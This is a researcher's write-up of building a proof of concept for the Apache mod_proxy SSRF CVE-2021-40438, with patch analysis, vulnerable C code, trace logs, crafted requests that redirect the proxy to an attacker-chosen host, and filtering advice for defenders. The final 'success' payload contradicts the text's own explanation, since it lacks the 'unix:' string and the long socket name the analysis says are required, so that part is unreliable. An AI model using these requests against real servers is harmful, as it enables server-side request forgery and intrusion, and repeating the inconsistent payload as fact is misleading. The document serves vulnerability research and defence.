Building a POC for CVE-2021-40438

If you’re blue team and want to know what an exploit for this looks like for filtering purposes, I’ve added that information for you in the conclusions section.

While working on one of the Insane machines on Hack The Box, I came across a scenario in which the SSRF in apache2’s mod_proxy looked like it might be the way in.

The apache2 version used for testing throughout this writeup is

Server version: Apache/2.4.48 (Debian)
Server built: 2021-08-12T09:37:43

The relevant bit of the configuration is this

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName firzenkali
        DocumentRoot /var/www/html

        LogLevel notice proxy:trace8

        ErrorLog ${APACHE_LOG_DIR}/firzenkali_error.log
        CustomLog ${APACHE_LOG_DIR}/firzenkali_access.log combined

        ProxyPass / "http://localhost:8000/"
        ProxyPassReverse / "http://localhost:8000/"
</VirtualHost>

The information readily available on CVE-2021-40438 is pretty slim, only giving a vague description:

https://nvd.nist.gov/vuln/detail/CVE-2021-40438
A crafted request uri-path can cause mod_proxy to forward the
request to an origin server choosen by the remote user. This issue
affects Apache HTTP Server 2.4.48 and earlier.

From there one can eventually find the relevant commits when reading through the different entries on mailing lists.

The relevant commit that fixes this issue is r1892814.
Its commit message helpfully says:

mod_proxy: Faster unix socket path parsing in the "proxy:" URL.

So that everyone can tell right away that it’s a security patch.

The Patch

So what has been changed? Here’s the relevant diff:

--- httpd/httpd/trunk/modules/proxy/proxy_util.c	2021/09/02 12:33:49	1892813
+++ httpd/httpd/trunk/modules/proxy/proxy_util.c	2021/09/02 12:37:02	1892814
@@ -2274,8 +2274,8 @@ static void fix_uds_filename(request_rec
     if (!r || !r->filename) return;
 
     if (!strncmp(r->filename, "proxy:", 6) &&
-            (ptr2 = ap_strcasestr(r->filename, "unix:")) &&
-            (ptr = ap_strchr(ptr2, '|'))) {
+            !ap_cstr_casecmpn(r->filename + 6, "unix:", 5) &&
+            (ptr2 = r->filename + 6 + 5, ptr = ap_strchr(ptr2, '|'))) {
         apr_uri_t urisock;
         apr_status_t rv;
         *ptr = '\0';
         rv = apr_uri_parse(r->pool, ptr2, &urisock);
         if (rv == APR_SUCCESS) {
             char *rurl = ptr+1;
             char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
             apr_table_setn(r->notes, "uds_path", sockpath);
             *url = apr_pstrdup(r->pool, rurl); /* so we get the scheme for the uds */
             /* r->filename starts w/ "proxy:", so add after that */
             memmove(r->filename+6, rurl, strlen(rurl)+1);
             ap_log_rerror(APLOG_MARK, APLOG_TRACE2, 0, r,
                     "*: rewrite of url due to UDS(%s): %s (%s)",
                     sockpath, *url, r->filename);
         }
         else {
             *ptr = '|';
         }
     }
 }

This code path will now only trigger if the “unix:” string is at the start of the proxy URL, directly after the “proxy:” prefix. Previously it would search through the whole URL for it using ap_strcasestr().
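To make the difference concrete, here is a minimal sketch of the two conditions in plain C. It is not the httpd code: ci_equal_n() and ci_find() are hypothetical stand-ins for ap_cstr_casecmpn() and ap_strcasestr(), and the names uds_check_unpatched() and uds_check_patched() are made up for this illustration.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive comparison of the first n bytes
 * (hypothetical stand-in for ap_cstr_casecmpn()). */
static int ci_equal_n(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
        if (a[i] == '\0')
            return 1;
    }
    return 1;
}

/* Case-insensitive substring search
 * (hypothetical stand-in for ap_strcasestr()). */
static const char *ci_find(const char *haystack, const char *needle)
{
    size_t n = strlen(needle);
    for (; *haystack; haystack++) {
        if (ci_equal_n(haystack, needle, n))
            return haystack;
    }
    return NULL;
}

/* Pre-patch condition: "unix:" anywhere in the string, then a '|' after it. */
int uds_check_unpatched(const char *filename)
{
    assert(filename != NULL);
    if (strncmp(filename, "proxy:", 6) != 0)
        return 0;
    const char *unix_pos = ci_find(filename, "unix:");
    return unix_pos != NULL && strchr(unix_pos, '|') != NULL;
}

/* Post-patch condition: "unix:" must directly follow "proxy:". */
int uds_check_patched(const char *filename)
{
    assert(filename != NULL);
    if (strncmp(filename, "proxy:", 6) != 0)
        return 0;
    if (!ci_equal_n(filename + 6, "unix:", 5))
        return 0;
    return strchr(filename + 6 + 5, '|') != NULL;
}
```

For a string like proxy:http://localhost:8000/test?unix:|test the first check matches and the second does not, while a legitimately configured proxy:unix:/some/socket|http://localhost/ passes both.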

When using mod_proxy it will usually rewrite urls like so:

 mod_proxy.c(683): [client 127.0.0.1:56772] AH03461: attempting to match URI path '/test' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56772] AH03464: URI path '/test' matches proxy handler 'proxy:http://localhost:8000/test'
 proxy_util.c(2244): [client 127.0.0.1:56772] http: found worker http://localhost:8000/ for http://localhost:8000/test?param1=test1&param2=test2
 mod_proxy.c(1258): [client 127.0.0.1:56772] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56772] AH00944: connecting http://localhost:8000/test?param1=test1&param2=test2 to localhost:8000
 proxy_util.c(2717): [client 127.0.0.1:56772] AH00947: connected /test?param1=test1&param2=test2 to localhost:8000

Line 2 of the output shows why it’s looking for the “proxy:” string at the beginning of the URL.


Since the unpatched version of the code helpfully looks everywhere for “unix:”, it can be appended as a parameter, for example, and will still trigger the UDS (Unix Domain Socket) code path above.

 mod_proxy.c(683): [client 127.0.0.1:60996] AH03461: attempting to match URI path '/test' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:60996] AH03464: URI path '/test' matches proxy handler 'proxy:http://localhost:8000/test'
 proxy_util.c(2244): [client 127.0.0.1:60996] http: found worker http://localhost:8000/ for http://localhost:8000/test?unix:|test
 proxy_util.c(2223): [client 127.0.0.1:60996] *: rewrite of url due to UDS(/var/run/apache2/): test (proxy:test)
 mod_proxy.c(1258): [client 127.0.0.1:60996] AH01143: Running scheme http handler (attempt 0)
 [client 127.0.0.1:60996] AH01144: No protocol handler was valid for the URL / (scheme 'http'). If you are using a DSO version of mod_proxy, make sure the proxy submodules are included in the configuration using LoadModule.

Note that the output on line 4 here corresponds to line 23 in the code segment above. So we’ve successfully triggered the code path that was altered in the patch.
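What the rewrite does to the string can be modelled in a few lines of C. This is a simplified sketch, not the httpd function: model_uds_rewrite() is a hypothetical name, the “unix:” match is case-sensitive, apr_uri_parse() and the runtime directory prefix are left out, and it assumes that r->filename holds the full URL including the query string at that point, as the “found worker ... for ...” log line suggests.

```c
#include <assert.h>
#include <string.h>

/*
 * Simplified model of the rewrite in the unpatched fix_uds_filename().
 * On a match, the text between "unix:" and '|' is copied to sock, and
 * everything after "proxy:" in filename is replaced by the text after '|'.
 * Returns 1 if a rewrite happened, 0 otherwise.
 */
int model_uds_rewrite(char *filename, char *sock, size_t sock_size)
{
    assert(filename != NULL && sock != NULL && sock_size > 0);
    if (strncmp(filename, "proxy:", 6) != 0)
        return 0;
    char *unix_pos = strstr(filename, "unix:");
    if (unix_pos == NULL)
        return 0;
    char *pipe_pos = strchr(unix_pos + 5, '|');
    if (pipe_pos == NULL)
        return 0;

    size_t sock_len = (size_t)(pipe_pos - (unix_pos + 5));
    if (sock_len >= sock_size)
        return 0;                       /* caller's buffer is too small */
    memcpy(sock, unix_pos + 5, sock_len);
    sock[sock_len] = '\0';

    const char *rurl = pipe_pos + 1;
    /* Same memmove as in the original: overwrite what follows "proxy:". */
    memmove(filename + 6, rurl, strlen(rurl) + 1);
    return 1;
}
```

Feeding it proxy:http://localhost:8000/test?unix:|test leaves proxy:test in the buffer with an empty socket name, which lines up with the “rewrite of url due to UDS” entry in the log.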

How to exploit?

At this point the vulnerable code path can be triggered, but it’s not clear what that actually lets us do that we’re not supposed to be able to.
Well, actually that’s not strictly true. The output on line 6 shows that the server tries to use the domain socket, but can’t figure out which protocol handler to use.

Another curious bit of the output is line 4. Where does “/var/run/apache2” come from? A good bet seems to be line 17 of the code.

char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
apr_table_setn(r->notes, "uds_path", sockpath);

This seems to set the sockpath to some path relative to some directory. So let’s see if we can get a bit further (at least in understanding) by altering the request a bit. Let’s request a UDS called “testsocket” and also explicitly specify our URL scheme after the pipe.

GET /?unix:testsocket|http://test/ HTTP/1.1

Sending this request produces the following output which seems a lot more interesting.

 mod_proxy.c(683): [client 127.0.0.1:56196] AH03461: attempting to match URI path '/' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56196] AH03464: URI path '/' matches proxy handler 'proxy:http://localhost:8000/'
 proxy_util.c(2244): [client 127.0.0.1:56196] http: found worker http://localhost:8000/ for http://localhost:8000/?unix:testsocket|http://test/
 proxy_util.c(2223): [client 127.0.0.1:56196] *: rewrite of url due to UDS(/var/run/apache2/testsocket): http://test/ (proxy:http://test/)
 mod_proxy.c(1258): [client 127.0.0.1:56196] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56196] AH00944: connecting http://test/ to test:80
 proxy_util.c(2530): [client 127.0.0.1:56196] AH02545: http: has determined UDS as /var/run/apache2/testsocket
 proxy_util.c(2717): [client 127.0.0.1:56196] AH00947: connected / to httpd-UDS:0
 (2)No such file or directory: AH02454: http: attempt to connect to Unix domain socket /var/run/apache2/testsocket (localhost) failed
 [client 127.0.0.1:56196] AH01114: HTTP: failed to make connection to backend: httpd-UDS
 proxy_util.c(2453): AH00943: http: has released connection for (localhost)

Firstly, note how on line 4 the “testsocket” string has been appended to the path from before. That means we actually control the second argument passed into the ap_runtime_dir_relative() function.

Secondly, on line 5 we can see that, now that we’ve specified the URL scheme, Apache uses a corresponding handler.

And lastly, notice how on line 10 connecting to the Unix domain socket fails.
At this point I was trying all kinds of things to trick Apache or just to find a usable domain socket, but couldn’t find any.

After a while I figured that using a domain socket is probably a dead end and decided to look at where the decision to use a domain socket is being made. The relevant code from a vulnerable version of proxy_util.c looks like this.

    uds_path = (*worker->s->uds_path ? worker->s->uds_path : apr_table_get(r->notes, "uds_path"));
    if (uds_path) {
        if (conn->uds_path == NULL) {
            /* use (*conn)->pool instead of worker->cp->pool to match lifetime */
            conn->uds_path = apr_pstrdup(conn->pool, uds_path);
        }
        if (conn->uds_path) {
            ap_log_rerror(APLOG_MARK, APLOG_DEBUG, 0, r, APLOGNO(02545)
                         "%s: has determined UDS as %s",
                         uri->scheme, conn->uds_path);
        }
        else {
            /* should never happen */
            ap_log_rerror(APLOG_MARK, APLOG_DEBUG, 0, r, APLOGNO(02546)
                         "%s: cannot determine UDS (%s)",
                         uri->scheme, uds_path);

        }
        /*
         * In UDS cases, some structs are NULL. Protect from de-refs
         * and provide info for logging at the same time.
         */
        if (!conn->addr) {
            apr_sockaddr_t *sa;
            apr_sockaddr_info_get(&sa, NULL, APR_UNSPEC, 0, 0, conn->pool);
            conn->addr = sa;
        }
        conn->hostname = "httpd-UDS";
        conn->port = 0;
    }
    else {

So the first thing for me was to realize that I can correlate some of the lines of code here to output in the log.
Line 2598 (the “has determined UDS as” log call) corresponds to line 8 in the log, and line 2617 (conn->hostname = "httpd-UDS") sets the hostname that shows up in line 11 of the log.

That means we’re probably looking at the correct piece of code here.
So what does it actually do?

In line 2590 (the first line of the snippet) it will either grab the path that’s cached in the worker or, if there isn’t one, take the one stored in the request notes as “uds_path”. We already know from observing the previous output that we can influence what this uds_path is. Next it checks if the uds_path variable has been set and, if so, goes into the code path above.

Since the uds_path variable here is just a C-string the only way to avoid this code path is by it being NULL. But we know where it is being set, so maybe there’s a way to actually get the uds_path to be NULL.
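The selection logic is small enough to model on its own. A minimal sketch, assuming the worker’s path is an empty string when no socket is configured and the request note comes back as NULL when it is missing or was stored as NULL; select_uds_path() and takes_uds_branch() are hypothetical names, not httpd functions.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Model of the first line of the snippet above.
 * worker_uds stands in for worker->s->uds_path (empty when unset),
 * note_uds for the "uds_path" entry in the request notes.
 */
const char *select_uds_path(const char *worker_uds, const char *note_uds)
{
    assert(worker_uds != NULL);
    return *worker_uds ? worker_uds : note_uds;
}

/* The UDS branch is taken for any non-NULL result, even an empty string. */
int takes_uds_branch(const char *worker_uds, const char *note_uds)
{
    return select_uds_path(worker_uds, note_uds) != NULL;
}
```

Only the combination of an empty worker path and a NULL note skips the branch, so an empty socket name alone is not enough.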

How uds_path is being set

From the code of the patch we know that the path is being assigned by ap_runtime_dir_relative(). There’s nothing particularly interesting in that function itself. It’s mainly a wrapper that resolves the runtime directory and then calls apr_filepath_merge(), which does the real bulk of the work here.

I’m snipping out most of the function because it’s quite big, but I encourage you to have a look yourself. Keep in mind that we want the path to not actually be constructed, so we’re mostly interested in error conditions.

    rootlen = strlen(rootpath);
    maxlen = rootlen + strlen(addpath) + 4; /* 4 for slashes at start, after
                                             * root, and at end, plus trailing
                                             * null */
    if (maxlen > APR_PATH_MAX) {
        return APR_ENAMETOOLONG;
    }
    path = (char *)apr_palloc(p, maxlen);

As the APR_PATH_MAX check shows (lines 153-155 of the original file), an easy option to cause an error might be to request an excessively long filename for the UDS. An important aside here is that no error checking is performed on the return value of this path construction.

char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
apr_table_setn(r->notes, "uds_path", sockpath);
*url = apr_pstrdup(r->pool, rurl); /* so we get the scheme for the uds */
/* r->filename starts w/ "proxy:", so add after that */
memmove(r->filename+6, rurl, strlen(rurl)+1);

The sockpath returned from ap_runtime_dir_relative() is written straight into the request notes. So if we can trigger this error condition, we might be able to get the request filename rewritten while the UDS path stays NULL. So let’s just give that a try.
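Before trying it, it helps to estimate how long the socket name has to be. The sketch below mirrors only the length check quoted above. The function names are hypothetical, and the concrete numbers rest on two assumptions: that APR_PATH_MAX is 4096 (the usual PATH_MAX on Linux) and that the root path is /var/run/apache2, as seen in the log.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Mirrors the length check quoted above: returns 1 if the merge would fail. */
int merge_too_long(const char *rootpath, size_t addpath_len, size_t path_max)
{
    assert(rootpath != NULL);
    size_t maxlen = strlen(rootpath) + addpath_len + 4;
    return maxlen > path_max;
}

/* Smallest addpath length for which the check above fires. */
size_t min_overflow_len(const char *rootpath, size_t path_max)
{
    assert(rootpath != NULL);
    size_t fixed = strlen(rootpath) + 4;
    if (fixed > path_max)
        return 0;                 /* the root alone already exceeds the limit */
    return path_max - fixed + 1;
}
```

Under those assumptions min_overflow_len("/var/run/apache2", 4096) comes out at 4077, so a socket name of a bit over four thousand characters should be enough to make the path construction fail.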

Success

Here is the request “payload” I’ve arrived at through the journey above.

GET /?unix|http://google.com/ HTTP/1.1

And here is the corresponding log output.

 mod_proxy.c(683): [client 127.0.0.1:56290] AH03461: attempting to match URI path '/' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56290] AH03464: URI path '/' matches proxy handler 'proxy:http://localhost:8000/'
 proxy_util.c(2244): [client 127.0.0.1:56290] http: found worker http://localhost:8000/ for http://localhost:8000/?unix|http://google.com/
 proxy_util.c(2223): [client 127.0.0.1:56290] *: rewrite of url due to UDS((null)): http://google.com/ (proxy:http://google.com/)
 mod_proxy.c(1258): [client 127.0.0.1:56290] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56290] AH00944: connecting http://google.com/ to google.com:80
 proxy_util.c(2717): [client 127.0.0.1:56290] AH00947: connected / to google.com:80
 proxy_util.c(3151): http: fam 2 socket created to connect to localhost
 proxy_util.c(3183): AH02824: http: connection established with 172.217.19.78:80 (localhost)
 proxy_util.c(3369): AH00962: http: connection complete to 172.217.19.78:80 (google.com)
 proxy_util.c(2453): AH00943: http: has released connection for (localhost)

The things to note here are line 4, which confirms that the UDS path has been set to NULL, and the absence of the “has determined UDS as” line from the log. This confirms that everything has gone according to plan and, as expected, the webserver helpfully connects to Google for us and forwards the response back.

Conclusion and Remarks

It was an interesting journey to try and figure out how to actually exploit this vulnerability, especially since, aside from the code, there wasn’t a lot of information readily available.

The lack of information seems to mainly be due to the Apache team’s policy to not release information on potential exploits. And I’m willing to speculate that the commit messages were deliberately not mentioning security issues as well.

I can understand where they are coming from, but ultimately it seems futile to me and does make other people’s work harder. The whole process outlined above took me about 6-7 hours to arrive at a working exploit and I can’t imagine I’m the first one to do it.

I hope that writing this up can help other researchers follow my process here, can motivate people to update their damn systems and can help people on blue teams to mitigate some of the risk by filtering out potential payloads if updating isn’t an option for whatever reason.

If you’re trying to replicate this and run into issues, try restarting apache.
The uds_path is cached in the workers and failed attempts might have cached bad values that prevent exploitation.

If you’re on a blue team and want to protect against this, you can look for requests that include the string “unix:” followed by a pipe “|” after the argument separator “?”. If the pipe isn’t part of the arguments it will get URL-encoded, which prevents the vulnerable code path from triggering, hence that restriction. The “unix:” string can be before or after the argument separator, but has to be before the pipe.
The long socket name may or may not be required depending on the URL scheme. I haven’t tested this for all possible ones.
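The filtering rule above can be sketched as a small C check on the raw request target. This is a heuristic illustration only, not a tested WAF rule: is_suspicious_target() and find_nocase() are hypothetical names, the match is done on the undecoded target, and false positives are possible for applications that legitimately use “unix:” and “|” in their parameters.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive search for needle in haystack; returns NULL if absent. */
static const char *find_nocase(const char *haystack, const char *needle)
{
    size_t n = strlen(needle);
    for (; *haystack; haystack++) {
        size_t i = 0;
        while (i < n && haystack[i] != '\0' &&
               tolower((unsigned char)haystack[i]) ==
               tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return haystack;
    }
    return NULL;
}

/*
 * Heuristic from the text: flag a request target that contains "unix:"
 * and, after both that string and the '?' separator, a raw '|'.
 */
int is_suspicious_target(const char *target)
{
    assert(target != NULL);
    const char *query = strchr(target, '?');
    if (query == NULL)
        return 0;
    const char *unix_pos = find_nocase(target, "unix:");
    if (unix_pos == NULL)
        return 0;
    /* The pipe has to come after whichever of the two appears later. */
    const char *start = unix_pos > query ? unix_pos : query;
    return strchr(start, '|') != NULL;
}
```

A target like /?unix:testsocket|http://test/ is flagged, while an ordinary /test?param1=test1&param2=test2 is not.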

5 Comments

  1. Hello,

    Nice POC !

    However, I found that mod_proxy caches the IP address of the proxy connection: if your ProxyPass has already been used, the request with |http://www.google.com/ will be directed to that IP, with Host: http://www.google.com in the header. If it has not been used before the attack, the IP address of Google will be cached, and a normal URL will be directed at Google.com!

  2. Firzen – this is timely and thorough analysis, which is helping many sites to be secured from the potential attack and the teams to re-think the web-server choice. Please continue writing & sharing. Much helpful.
